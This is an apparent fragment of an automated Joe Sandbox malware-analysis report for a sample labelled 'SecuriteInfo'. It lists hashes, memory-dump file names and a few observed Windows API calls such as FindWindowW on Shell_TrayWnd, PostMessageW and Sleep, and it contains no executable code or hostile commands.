                              • Instruction Fuzzy Hash: 81E039B02147118ED330DF28E5047827AE0FF00754F00892CE456C3750D7B4E508DB62
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00905BF5
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00905C08
                                • Part of subcall function 008E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: fc7eaf939902fa373221c725bb8ebd8ac5d4c94c2ae5ed4eb9be91995ae3f1ea
                              • Instruction ID: 69768db888d204c9ba44512c0e60646d8f69253fe9842540a7e1f07351a193db
                              • Opcode Fuzzy Hash: fc7eaf939902fa373221c725bb8ebd8ac5d4c94c2ae5ed4eb9be91995ae3f1ea
                              • Instruction Fuzzy Hash: 8ED0A93139C300BAE338AB70AC1BFA32A14AB00B04F000828B245AA0D0C8E05900D640